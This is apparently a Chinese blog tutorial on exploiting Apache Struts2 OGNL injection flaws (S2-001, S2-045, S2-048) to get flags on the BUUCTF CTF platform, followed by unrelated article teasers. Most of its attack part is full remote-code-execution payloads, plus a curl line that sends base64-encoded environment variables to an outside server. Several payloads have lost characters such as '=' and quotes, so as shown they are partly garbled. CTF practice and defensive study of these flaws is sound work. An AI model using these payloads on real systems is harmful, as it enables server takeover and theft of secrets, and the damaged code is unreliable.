当前位置: 首页 > article >正文

BUUCTF平台实战:手把手教你利用Struts2漏洞获取flag(附工具推荐)

BUUCTF平台实战从Struts2漏洞入门到flag获取全指南第一次接触CTF比赛时看到那些复杂的漏洞利用过程总让人望而生畏。直到在BUUCTF平台上遇到了Struts2系列漏洞才发现原来漏洞利用也可以如此标准化。本文将带你从零开始用最直观的方式理解Struts2漏洞的利用逻辑并分享几个我在实战中总结的高效技巧。1. 环境准备与工具配置工欲善其事必先利其器。在开始漏洞利用前需要准备以下环境虚拟机环境推荐使用VirtualBox搭配Kali Linux避免对主机系统造成意外影响网络配置确保能访问BUUCTF平台http://buuoj.cn必要工具Struts2-ScanGitHub开源项目Burp Suite Community版Chrome浏览器Postman插件工具配置关键步骤git clone https://github.com/HatBoy/Struts2-Scan.git cd Struts2-Scan pip install -r requirements.txt注意所有操作建议在隔离的虚拟环境中进行避免与本地Python环境冲突我曾遇到过工具运行报错的问题后来发现是Python库版本不兼容。如果遇到类似情况可以尝试pip install --upgrade urllib3 requests2. Struts2漏洞原理速成Struts2漏洞主要源于OGNL表达式注入。简单理解就是攻击者能够通过精心构造的输入让服务器执行非预期的OGNL代码。常见漏洞版本及其特征漏洞编号影响版本利用方式典型特征S2-001Struts 2.0-2.0.8表单验证绕过%{...}语法S2-005Struts 2.0.0-2.1.8.1参数值注入\u0023代替#S2-007Struts 2.0.0-2.2.3类型转换错误利用 payload S2-045Struts 2.3.5-2.3.31文件上传漏洞Content-Type注入理解漏洞本质所有Struts2漏洞利用的核心都是通过某种方式让#_memberAccess.allowStaticMethodAccess变为true从而获得执行系统命令的权限。3. 实战演练从S2-001到S2-0573.1 S2-001漏洞利用四步法识别漏洞点查找使用表单验证的页面构造payload%{ #a(new java.lang.ProcessBuilder(new java.lang.String[]{env})).start(), #b#a.getInputStream(), #cnew java.io.InputStreamReader(#b), #dnew java.io.BufferedReader(#c), #enew char[50000], #d.read(#e), #f#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse), #f.getWriter().println(new java.lang.String(#e)) }发送请求通过Burp Repeater模块修改请求参数提取flag在响应中搜索flag{格式的字符串实战技巧如果env命令无效可以尝试ls /查看目录结构有时flag会存放在特定文件中3.2 自动化工具高效利用对于S2-005、S2-008等漏洞使用Struts2-Scan可以大幅提高效率python Struts2Scan.py -u http://target.com/login.action -n s2-005工具运行后会生成可用payload复制到Burp Suite中发送即可。我整理了几个常见问题解决方法乱码问题在Burp的Decoder模块中对payload进行URL编码无回显情况尝试使用DNS外带技术Runtime.getRuntime().exec(curl http://your-server/?data$(env|base64))工具误报手动验证时添加id等简单命令测试4. 疑难漏洞突破技巧4.1 S2-045文件上传漏洞这个漏洞的特殊之处在于利用HTTP头部的Content-Type字段注入POST /upload.action HTTP/1.1 Content-Type: %{(#_multipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdenv).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}4.2 S2-048插件漏洞这个漏洞需要先找到插件入口通常URL路径包含/integration/或/showcase。成功访问后在输入框注入%{ (#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]). (#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)). (#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))). (#qorg.apache.commons.io.IOUtilstoString(java.lang.RuntimegetRuntime().exec(ls /).getInputStream())) }5. 防御视角与学习建议理解攻击手段是为了更好地防御。在实战中我总结了几个关键点漏洞识别检查Struts2版本号关注官方安全公告临时缓解在web.xml中添加过滤器拦截恶意请求filter filter-namestruts2/filter-name filter-classorg.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter/filter-class init-param param-nameexcludePatterns/param-name param-value.*\.(gif|png|jpg|css|js)$/param-value /init-param /filter长期防护及时升级到最新安全版本对于想深入学习的朋友推荐按照这个路线图进阶先在BUUCTF上完成所有Struts2漏洞挑战阅读CVE详细报告如CVE-2017-5638尝试编写简单的OGNL表达式检测工具研究WAF如何拦截Struts2攻击流量

相关文章:

BUUCTF平台实战:手把手教你利用Struts2漏洞获取flag(附工具推荐)

BUUCTF平台实战:从Struts2漏洞入门到flag获取全指南 第一次接触CTF比赛时,看到那些复杂的漏洞利用过程总让人望而生畏。直到在BUUCTF平台上遇到了Struts2系列漏洞,才发现原来漏洞利用也可以如此"标准化"。本文将带你从零开始&#…...

ROS机器人开发实战:用tf库搞定四元数、欧拉角、旋转矩阵的6种转换(附C++/Python代码)

ROS机器人开发实战:四元数、欧拉角与旋转矩阵的高效转换指南 在机器人开发中,姿态表示就像工程师的语言——四元数、欧拉角和旋转矩阵各有其独特的语法规则。记得第一次调试机械臂时,我被这些转换搞得晕头转向,直到发现tf库这个&q…...

从凯撒密码到AES:用Python手把手实现5种加密算法,理解它们的本质区别

从凯撒密码到AES:用Python手把手实现5种加密算法,理解它们的本质区别 加密技术就像数字世界的隐形护盾,从古罗马战场的密信到现代银行的在线交易,算法进化史就是一部人类与破解者斗智斗勇的编年史。今天我们将用Python这把"解…...

一款基于 .NET 开源、跨平台应用程序自动升级组件适

基础示例:单工作表 Excel 转 TXT 以下是将一个 Excel 文件中的第一个工作表转换为 TXT 的完整步骤: 1. 加载并读取Excel文件 from spire.xls import * from spire.xls.common import * workbook Workbook() workbook.LoadFromFile("示例.xlsx"…...

04-微服务篇

文章目录一、Spring Cloud1. Spring Cloud 5大组件有哪些?2. 服务注册和发现是什么意思?Spring Cloud 如何实现服务注册发现?3. 我看你之前也用过nacos,你能说下nacos与eureka的区别?4. 你们项目负载均衡如何实现的&am…...

微星主板无U更新BIOS

客户的微星PRO B650M-P 主板升级9600X cpu 开不了机,手头也没低点的U 看了下主板支持Flash BIOS Button 也就是无U盲刷BIOS 首先 U 盘需要格式化FAT32 格式 ,然后 官网下载最新BIOS解压缩后修改文件名需成 MSI.ROM ,然后复制到U盘根目录 ,插入主板BIOS USB接口 然后 插上CPU 供…...

重新定义窗口自由:SRWE如何解锁任意程序的分辨率限制

重新定义窗口自由:SRWE如何解锁任意程序的分辨率限制 【免费下载链接】SRWE Simple Runtime Window Editor 项目地址: https://gitcode.com/gh_mirrors/sr/SRWE 你是否曾因软件窗口无法调整到理想尺寸而感到束手无策?当游戏只支持有限分辨率、专业…...

把近万个源文件喂给AI之前,我先做了一件事刀

插件化架构 v3 版本最大的变化是引入了模块化插件系统。此前版本中集成在核心包里的原生功能,现在被拆分成独立的插件。 每个插件都是一个独立的 Composer 包,包含 Swift 和 Kotlin 代码、权限清单以及原生依赖。开发者只需安装实际用到的插件&#xff0…...

Windows 11下ROS2 Humble与PyCharm无缝集成实战(避坑指南+完整配置流程)

Windows 11下ROS2 Humble与PyCharm无缝集成实战(避坑指南完整配置流程) 在机器人操作系统(ROS)生态中,Windows平台的支持一直是个挑战。随着ROS2 Humble版本的发布,微软与开源社区的深度合作为Windows开发者…...

Linux内核中的命名空间详解

Linux内核中的命名空间详解 引言 命名空间(Namespace)是Linux内核中实现资源隔离的重要机制,它为容器技术提供了基础支持。通过命名空间,不同的进程可以看到不同的系统视图,实现了进程间的隔离。本文将深入探讨Linux内…...

手把手调参:解决OpenCV光流法追踪“跟丢”和“鬼影”的实战指南

手把手调参:解决OpenCV光流法追踪“跟丢”和“鬼影”的实战指南 去年在开发一套工业质检系统时,我们遇到了一个棘手问题:传送带上的零件因为表面反光和快速移动,导致光流追踪频繁丢失目标。经过两周的密集调参和算法优化&#xff…...

Linux内核中的热插拔详解

Linux内核中的热插拔详解 引言 热插拔(Hotplug)是Linux内核中的一项重要功能,它允许在系统运行时动态添加或移除硬件设备,无需重启系统。热插拔技术大大提高了系统的灵活性和可用性,广泛应用于服务器、工作站和嵌入式系…...

从玩具四轴到工业机械臂:无刷电机120度与180度导通角该怎么选?实战经验分享

从玩具四轴到工业机械臂:无刷电机120度与180度导通角该怎么选?实战经验分享 当你在设计一台需要精确控制的无人机或工业机械臂时,无刷电机的驱动策略选择往往成为决定项目成败的关键因素之一。我曾见过一个团队花费数月时间优化机械臂算法&am…...

LangGraph架构深度解析:如何构建企业级状态化智能体工作流

LangGraph架构深度解析:如何构建企业级状态化智能体工作流 【免费下载链接】langgraph Build resilient language agents as graphs. 项目地址: https://gitcode.com/GitHub_Trending/la/langgraph LangGraph是一个基于Pregel算法的低层级编排框架&#xff0…...

根据WFWORKITEM 表的< PROCESSDEFNAME>字段关联WFPROCESSDEFPROPERTIES表获取对应app_code

问题描述&#xff1a; 根据WFWORKITEM 表的< PROCESSDEFNAME>字段关联WFPROCESSDEFPROPERTIES表获取对应app_code 解答: 因为WFPROCESSDEFPROPERTIES表在同一个<tenant_id>&#xff08;租户&#xff09;的<PROCESSDEFNAME>值是唯一的&#xff0c; 所以可…...

Linux I/O 演进史:从管道到零拷贝,一篇串起个服务端核心原语于

前言 在使用 kubectl get $KIND -o yaml 查看 k8s 资源时&#xff0c;输出结果中包含大量由集群自动生成的元数据&#xff08;如 managedFields、resourceVersion、uid 等&#xff09;。这些信息在实际复用 yaml 清单时需要手动清理&#xff0c;增加了额外的工作量。 使用 kube…...

RIGOL DS2302A-S数字示波器:高性能信号分析的终极解决方案

1. 为什么工程师都爱用RIGOL DS2302A-S&#xff1f; 第一次接触RIGOL DS2302A-S是在调试一块高速PCB板时&#xff0c;当时手头的示波器死活抓不到那个诡异的时钟抖动。同事把他的DS2302A-S推过来&#xff0c;300MHz带宽配合2GSa/s采样率&#xff0c;瞬间就让那个藏在噪声里的3n…...

Windows注册表深度解析:核心结构与关键应用场景

1. Windows注册表的核心结构解析 第一次打开注册表编辑器时&#xff0c;那个树状结构的界面可能会让人望而生畏。但当你理解它的设计逻辑后&#xff0c;会发现这个"系统大管家"其实很有条理。注册表的核心是五大根键&#xff08;Root Key&#xff09;&#xff0c;每个…...

科哥Face Fusion镜像:UI界面自定义修改,实现边框特效的保姆级教程

科哥Face Fusion镜像&#xff1a;UI界面自定义修改&#xff0c;实现边框特效的保姆级教程 1. 从基础融合到创意特效的升级之路 如果你已经体验过科哥Face Fusion镜像的基础人脸融合功能&#xff0c;可能会好奇&#xff1a;这个强大的工具能否进一步个性化&#xff1f;比如为合…...

Piggy_Packages V2026.1 帮助文档(九)模式评估

获取Piggy_Packages 还没有Piggy_Packages的同学&#xff0c;请参考这篇帖子获取&#xff1a; Piggy_Packages V2026.1 帮助文档&#xff08;一&#xff09;开箱即用 模型评估工具&#xff08;MET&#xff09;是一种常用的对WRF预报结果进行评估的工具。今天我们来学习一项它…...

深入探讨Android Framework开发工程师:职责、技术与面试指南

引言 Android Framework开发工程师是移动操作系统领域的核心角色,负责构建和维护Android系统的底层框架。该岗位要求深入理解系统架构,解决性能瓶颈,并确保应用稳定性。随着Android生态的快速发展,掌握Framework开发技术成为高级工程师的必备技能。本文基于标准职位描述,…...

我试了四种去除 Gemini 水印的方法,整理成一篇实用对比驹

认识Pass层级结构 Pass范围从上到下一共分为5个层级&#xff1a; 模块层级&#xff1a;单个.ll或.bc文件 调用图层级&#xff1a;函数调用的关系。 函数层级&#xff1a;单个函数。 基本块层级&#xff1a;单个代码块。例如C语言中{}括起来的最小代码。 指令层级&#xff1a;单…...

基于蓝牙BLE芯片的无人机识别参考方案

蓝牙BLE芯片的底层能力&#xff0c;主要集中在射频信号处理、基带算法、网络协议栈以及低功耗全局优化几个方面。以市面上典型的方案为例&#xff0c;采用青稞RISC-V处理器内核作为计算核心&#xff0c;同时集成了USB、防水级触摸感应、NFC、段式LCD等多种外设接口。这意味着它…...

【大模型工程化生死线】:版本失控=线上崩盘?3步构建军工级回滚机制

第一章&#xff1a;大模型工程化版本管理与回滚机制 2026奇点智能技术大会(https://ml-summit.org) 大模型工程化中的版本管理远超传统软件的 Git commit 粒度&#xff0c;需同时追踪模型权重、Tokenizer 配置、训练超参、推理服务镜像及依赖环境快照。单一 SHA 哈希已无法承载…...

如何在 Go 中构建支持持久化存储的权威 DNS 服务器

本文介绍如何基于 miekg/dns 库实现具备持久化能力的权威 dns 服务器&#xff0c;涵盖原生 zone 文件支持、外部存储集成方案&#xff08;如 etcd&#xff09;&#xff0c;以及实际部署注意事项。 本文介绍如何基于 miekg/dns 库实现具备持久化能力的权威 dns 服务器&…...

GLM-4.1V-9B-Base效果展示:中文菜单图片→菜品识别→价格/辣度/推荐指数

GLM-4.1V-9B-Base效果展示&#xff1a;中文菜单图片→菜品识别→价格/辣度/推荐指数 1. 模型介绍 GLM-4.1V-9B-Base是智谱开源的一款视觉多模态理解模型&#xff0c;专门针对中文场景下的图像理解任务进行了优化。不同于普通的图像识别模型&#xff0c;它能够结合视觉内容和自…...

重新思考输入边界:QKeyMapper如何颠覆Windows平台输入设备协作范式

重新思考输入边界&#xff1a;QKeyMapper如何颠覆Windows平台输入设备协作范式 【免费下载链接】QKeyMapper [按键映射工具] QKeyMapper&#xff0c;Qt开发Win10&Win11可用&#xff0c;不修改注册表、不需重新启动系统&#xff0c;可立即生效和停止。支持游戏手柄映射到键鼠…...

LLM服务SLA跌破99.2%?(GPU资源利用率不足31%真相曝光)——弹性伸缩动态水位算法实战手册

第一章&#xff1a;LLM服务SLA跌破99.2%&#xff1f;——GPU资源利用率不足31%的系统性归因 2026奇点智能技术大会(https://ml-summit.org) 当大模型推理服务的端到端SLA连续三小时低于99.2%&#xff0c;而监控平台却显示A100集群平均GPU利用率长期徘徊在28%–31%之间时&#…...

江西市口碑好的专业中专学校哪家权威

江西市口碑好的专业中专学校哪家权威在江西省&#xff0c;选择一所口碑好且权威的专业中专学校对于学生未来的职业发展至关重要。赣州现代科技职业学校作为赣州市的一所知名职业高中&#xff0c;在教学质量、实训设施以及就业保障等方面都表现出色&#xff0c;是众多学子和家长…...

为什么92%的AI原生应用无法精准归因故障?曝光3个被忽视的OpenTelemetry SDK陷阱、2个LLM Token级Span拆分反模式

第一章&#xff1a;AI原生软件研发链路追踪系统搭建 2026奇点智能技术大会(https://ml-summit.org) AI原生软件的研发过程高度依赖模型版本、数据集快照、训练参数、推理服务部署状态及用户反馈信号的强关联性。传统APM工具难以刻画从Prompt工程→微调训练→RAG索引更新→LLM网…...